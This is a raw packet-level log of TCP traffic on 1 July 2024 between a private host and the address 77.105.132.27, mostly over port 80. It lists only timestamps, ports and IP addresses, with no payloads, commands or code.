Jul 1, 2024 09:16:15.881692886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881694078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881705046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881716967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881722927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881728888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881756067 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882082939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882093906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882110119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882122040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882150888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882322073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882332087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882344007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882354975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882366896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882378101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882380962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882388115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882399082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882406950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882411003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882422924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882426023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882433891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882446051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882456064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882457972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882471085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882476091 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882483959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882493973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882499933 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882505894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.882520914 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.882550001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883009911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883021116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883032084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883038998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883049011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883061886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883065939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883074045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883085012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883096933 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883101940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883153915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883153915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883351088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883363008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883372068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883383989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883402109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883402109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883414030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883425951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883425951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883438110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883449078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883450031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883459091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883470058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883472919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883481026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883481979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883492947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883502960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.883506060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.883539915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884074926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884085894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884097099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884108067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884119987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884124994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884131908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884144068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884150982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884156942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884165049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884167910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884183884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884186983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884195089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884205103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884210110 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884217024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884228945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884239912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884248018 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884251118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884257078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884263039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884274006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884284973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.884287119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884309053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.884330988 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885044098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885063887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885075092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885087967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885088921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885101080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885102034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885113001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885123968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885135889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885143995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885147095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885159016 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885164976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885169983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885180950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885181904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885191917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885202885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885205984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885215044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885226965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885227919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885238886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885246038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885250092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885256052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885261059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885282040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885309935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.885958910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885971069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885982037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.885993004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886003017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886013985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886022091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886033058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886044025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886044979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886054993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886058092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886065960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886079073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886089087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886090040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886101961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886109114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886113882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886125088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886126041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886136055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886143923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886148930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886159897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886183023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886214018 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.886722088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.886765003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.888973951 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.939351082 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977615118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977633953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977647066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977689981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977690935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977700949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977713108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977726936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977735043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977756023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977778912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977834940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977847099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977869987 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977886915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977946043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977957964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977968931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977982044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.977991104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.977998972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978010893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978018999 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978022099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978034973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978037119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978065014 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978415012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978425980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978436947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978449106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978458881 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978461981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978471041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978482008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978482008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978493929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978499889 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978504896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978516102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978543997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978697062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978734970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978746891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978760958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978787899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978842974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978856087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978867054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978880882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978883982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978894949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978905916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978909016 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978915930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978925943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978935957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978936911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978948116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978954077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978960037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978970051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978971958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.978981018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978991985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.978996992 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979002953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979013920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979032040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979043961 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979762077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979774952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979784012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979789972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979799986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979810953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979818106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979831934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979842901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979846954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979854107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979863882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979876995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.979882002 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979892969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.979908943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980273962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980284929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980295897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980307102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980319023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980323076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980329990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980341911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980354071 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980369091 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980391979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980551958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980562925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980573893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980585098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980587959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980598927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980602980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980626106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980650902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980685949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980706930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980716944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980730057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980741024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980742931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980753899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980766058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980770111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980777025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980782986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980792999 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980794907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980806112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980809927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980818033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980823994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980829000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.980850935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.980875969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981606007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981622934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981651068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981661081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981673002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981678963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981683969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981694937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981704950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981709957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981718063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981724024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981729984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981739998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981740952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981750965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981762886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981770039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981772900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981784105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981795073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981797934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981806040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981817007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981827974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.981833935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981853962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.981869936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.982495070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982506990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982517004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982528925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982538939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982544899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.982551098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982562065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982573032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982574940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.982584953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982589960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.982598066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982606888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.982609034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.982636929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.073240042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073308945 CEST	80	49752	77.105.132.27	192.168.2.4
